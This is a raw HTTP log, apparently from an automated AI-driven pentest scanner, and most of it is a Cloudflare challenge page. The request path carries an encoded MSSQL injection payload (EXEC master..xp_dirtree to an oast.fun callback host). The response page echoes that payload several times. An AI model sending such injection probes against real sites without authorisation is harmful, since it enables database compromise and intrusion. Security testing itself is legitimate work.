REQUEST:
GET https://my.myfirst.tech//my.myfirst.tech/cdn/shop/t/%27%3B%20EXEC%20master..xp_dirtree%20%27%5C%5Ch0cqg45t8jh21623dc0zadz2lbov71tm8.oast.fun%5Ca%27%3B--%20-/assets/section-image-banner.css
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:30 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9824
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c847a08961a110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=d8VGw317lVeSE9%2F0hKCLrFs7V4zy5T4aFyYYdPr6GrDilhn9LRhrMGi1FbpnkCN8nXPoIoRko5Prfx%2BtWNahxGbSxbn2ixw5gqzO%2BRh4C53Czpuz52mi7BZhcElvJs%2FLTc1f4n2KRDNqcMABow%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c847a08961a110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'wBpbusd.d8eTnCSwDKIKwNcPANBmBCkwL7OXFx8xO64-1784281170-1.2.1.1-zbB.KetNVhA.C8mC98IFnHfm0UqgDf0R9LG3_H6iHeS4NPMtzHXVtp6J1UPXtrZE',cITimeS: '1784281170',cRay: 'a1c847a08961a110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/my.myfirst.tech/cdn/shop/t/';%20EXEC%20master..xp_dirtree%20'%5C%5Ch0cqg45t8jh21623dc0zadz2lbov71tm8.oast.fun%5Ca';--%20-/assets/section-image-banner.css?__cf_chl_tk=5L434AJx0XCRThhhEavOCrEU1k_XXEC_Lg9J2gIHuwI-1784281170-1.0.1.1-gro_HcUsVtlmXcF_JjJpT5i6iQdH3ing8oFcNB4o05c",cvId: '3',cZone: 'my.myfirst.tech',fa:"/my.myfirst.tech/cdn/shop/t/';%20EXEC%20master..xp_dirtree%20'%5C%5Ch0cqg45t8jh21623dc0zadz2lbov71tm8.oast.fun%5Ca';--%20-/assets/section-image-banner.css?__cf_chl_f_tk=5L434AJx0XCRThhhEavOCrEU1k_XXEC_Lg9J2gIHuwI-1784281170-1.0.1.1-gro_HcUsVtlmXcF_JjJpT5i6iQdH3ing8oFcNB4o05c",md: 'JUNlx1si0RsU3hcxTZG5qyFUKEbrPVA8d06ngswIAPs-1784281170-1.2.1.1-JmifyVaOy7Kg.hD4g19Ia66fdFG_6XHD8yT6SmUuP_0k9PjgWceIiJYstuOUnC56b67kIvL4d1PW9FT_0wdrI5EwDk1nKmr3kfdwIdA556nc2K39hYX5peB3vgnvf3EzXmoKkW.zoscIUCBJMqtgdMvrPgdHKrdA.zmhiWAC5R7pa1DLrB_gGIpkllOqTiMfUJEz.JlBeHKhqjkIxs84TrLnA0HK_gPjVykCnW7Zg7aZ4N7g9ALvOFz4iLngiR0fMCfGfWOE7jFzXjYT1fWcy4q3g9Eb3lttiDLSeyJpXRCXiAmfLm27fMkNwbe_2hpIRTNbMmvcjbSdJbJM8E5JNmryC27vcwSDEPRbbwKSruSnMAo_O6YWqj5tlNJQawzXf5w6C2.mxEXmLdIQe5LaQJGmUM3Kc9JRLP.fGKC8ArxPSiKdyjN262U3BDXizJxU6PsAdvP6ctk35mWMWvCJNfkJNozkz_RGuNVN4ZaDXxvRWVxxsO2UIAytS5A1z2OVtapl0fARdWSmpGkfDFU8DjinYbq7RY7aw_l7NiHzkCXel7ODvBUB8yilIYgR92PVpRwalT.3_7pSYoNRk.IUtEiPN97f1Bp164ThatjqWIwrnYtpDTfX_CH9MvU29M1Q4IOMOsnCY14dnpC2A7RNx7di8r5WEdy4cznLaauu618Fm3fdw0MA8QbEHSkUYsTO.QAa0VHMb.iF1SQubloRtm5pohgndhq8Y1AAbdNAuX8wXwA4C08epJB5H7h5o6ZacsEFxhZE_OGoJzarM8KZOT1mzDXIenEVDpe2GyNwrUApqMyDsT5dXe.xcvH6DOheHdYT8FHQPWCdUqHFG3T._z6pk7y8OnbpUakIdr_oD0paMKx3ssW..idV1uhpvTS6c8JoZP6k3VmctkUvYvNtAsOV9eY_9OLry6VwNf8EF4iZZ4kEOw9Pu37v4LVmzBlEefnSUWa5CliPvbtSm9iuliDPhGH_7e.cnMJDliFnAThDuO7EFrizF_woW7dDHg6cu67sAggDfilleJpWKJ7Ery0nK7ufeRa00Qwa0ksGFGiZI90gCVM4MZGd1RZCgzKZkeehr6wMIRxWtoh5diltJSeQ9K861xQb4E2qWddmLpD5_JLMrHJuSfUWFZFTHRbKzzpo8La.J8tySqUTLPh1ImGXmVmt6vZdiT0Q0m8nsK2QzCZyz_WjK1n70I6if39mocEIp8bQ8Kf22xAEGsbBWwQ.rdIu4oZXfRKF4vMwXC9bGyVaSPPscqvqEBQ7_bCAwEJeycU1X_n4aEMHnEzTDeIxhcoC88z6XJ36NV0ceM3wheHpktIQF8UfvHKwihejzkfNXhyeqj503KPr9JvLnw',mdrd: 'lkYFhroY4JB0WaF0zVsV1a1ARx1K0jOAIRz90.8.bVE-1784281170-1.2.1.1-IAYSJEHNuOu0qVEd6hDreHoxZQbvQOtilhJhDaaX4pRLaI9oFX3iJyFJCBmz5IcQhiDqh8SHSuf.XgT_tDUUvLxb97SIORgWcR7QkQjoKoC_R2iiSi7jzPAYcqgkwiKl7dUD7oFSWt6_8DzfqKokUWuQIRsM74mfii_WvZnWT7wHhGAtEThDLXS2X6xsUJVcRcecDqq8kxjylZgjt_uQ8_S7UTcQkwiulqUTbD52zRTrOfsEhrdOp4mitvAGjwHq',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c847a08961a110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/my.myfirst.tech/cdn/shop/t/';%20EXEC%20master..xp_dirtree%20'%5C%5Ch0cqg45t8jh21623dc0zadz2lbov71tm8.oast.fun%5Ca';--%20-/assets/section-image-banner.css?__cf_chl_rt_tk=5L434AJx0XCRThhhEavOCrEU1k_XXEC_Lg9J2gIHuwI-1784281170-1.0.1.1-gro_HcUsVtlmXcF_JjJpT5i6iQdH3ing8oFcNB4o05c"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
